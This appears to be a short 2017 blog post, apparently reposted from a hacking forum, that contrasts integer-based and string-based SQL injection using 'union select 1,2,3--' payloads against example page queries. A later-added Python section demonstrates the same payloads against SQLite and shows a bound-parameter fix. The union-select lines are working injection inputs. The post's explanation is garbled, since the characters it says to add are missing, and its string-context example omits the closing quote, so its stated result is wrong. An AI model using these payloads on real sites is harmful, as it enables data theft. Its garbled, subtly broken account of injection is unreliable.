Wednesday, May 24, 2017
Difference between integer based and string based SQL injection
Hi friends, I had posted a question on hackforums about the difference between string-based and integer-based SQL injection. It can be explained as follows:
Integer:
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1
?id=10 union select 1,2,3--
Finally you get:
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
String:
SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1
?id=10 union select 1,2,3--+
Final:
select * from pages where page_id="10" union select 1,2,3--+ order by title limit 1,1
So in integer-based SQL injection you don't have to put a and in string-based SQL injection you have to put a and a + sign at the end.
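The two contexts above can be reproduced locally to see why they behave differently and how one fix covers both. This is an added example, not code from the original post: the SQLite in-memory database, the three-column pages schema, the function names and the simplified ORDER BY/LIMIT tail are assumptions, and single quotes stand in for the post's double quotes because SQLite reserves double quotes for identifiers.

```python
import sqlite3

# The post's integer-context input, minus the "?id=" URL prefix.
PAYLOAD = "10 union select 1,2,3--"
TAIL = " ORDER BY title LIMIT 1"   # simplified from the post's "limit 1,1"

def make_db():
    """Constructed sample data: a three-column pages table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (page_id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(10, "About", "about us"), (11, "Contact", "mail us")])
    return db

def integer_context(db, page_id):
    # Vulnerable: the value is pasted where SQL expects a bare number, so
    # everything after the digits is parsed as SQL and "--" comments out TAIL.
    sql = "SELECT * FROM pages WHERE page_id=" + page_id + TAIL
    return db.execute(sql).fetchall()

def string_context(db, page_id):
    # Still concatenation, hence still unsafe, but the value sits inside a
    # quoted literal: the same text is compared as one string, not parsed.
    sql = "SELECT * FROM pages WHERE page_id='" + page_id + "'" + TAIL
    return db.execute(sql).fetchall()

def bound_parameter(db, page_id):
    # Fix for both contexts: validate the type, then bind the value so it
    # never becomes part of the SQL text.
    if not page_id.isdigit():
        raise ValueError("page_id must be a non-negative integer")
    sql = "SELECT * FROM pages WHERE page_id=?" + TAIL
    return db.execute(sql, (int(page_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("integer:", integer_context(db, PAYLOAD))
    print("string: ", string_context(db, PAYLOAD))
    print("bound:  ", bound_parameter(db, "10"))
```

The string-context result is empty only because this input never leaves the literal; the durable fix in either context is the bound parameter.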
the original post here
enjoy